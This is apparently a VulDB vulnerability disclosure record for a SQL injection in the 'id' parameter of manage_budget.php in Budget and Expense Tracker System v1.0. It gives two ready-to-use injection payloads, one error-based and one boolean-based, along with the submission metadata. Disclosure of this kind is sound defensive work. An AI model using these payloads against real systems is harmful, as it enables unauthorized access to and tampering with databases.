| Title | Budget and Expense Tracker System v1.0 /expense_budget/admin/budget/manage_budget.php GET parameter id SQL injection vulnerability |
|---|---|
| Description | An issue was discovered in Budget and Expense Tracker System v1.0. There is a SQL injection that can directly issue instructions to the backend database system via /expense_budget/admin/budget/manage_budget.php?id. Payload1: `id=1' and (select 2 from(select count(*),concat(0x55565758,(select (elt(888=888,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'a'='a` Payload2: `id=1' and 777=777 and 'GSD'='GSD` |
| Source | https://github.com/wucwu1/CVEApplication/blob/main/SQL.md |
| User | wucwu1 (UID 46807) |
| Submission | 05/17/2023 03:38 (3 years ago) |
| Moderation | 05/17/2023 18:53 (15 hours later) |
| Status | Accepted |
| VulDB entry | 229278 [SourceCodester Budget and Expense Tracker System 1.0 GET Parameter manage_budget.php ID sql injection] |
| Points | 20 |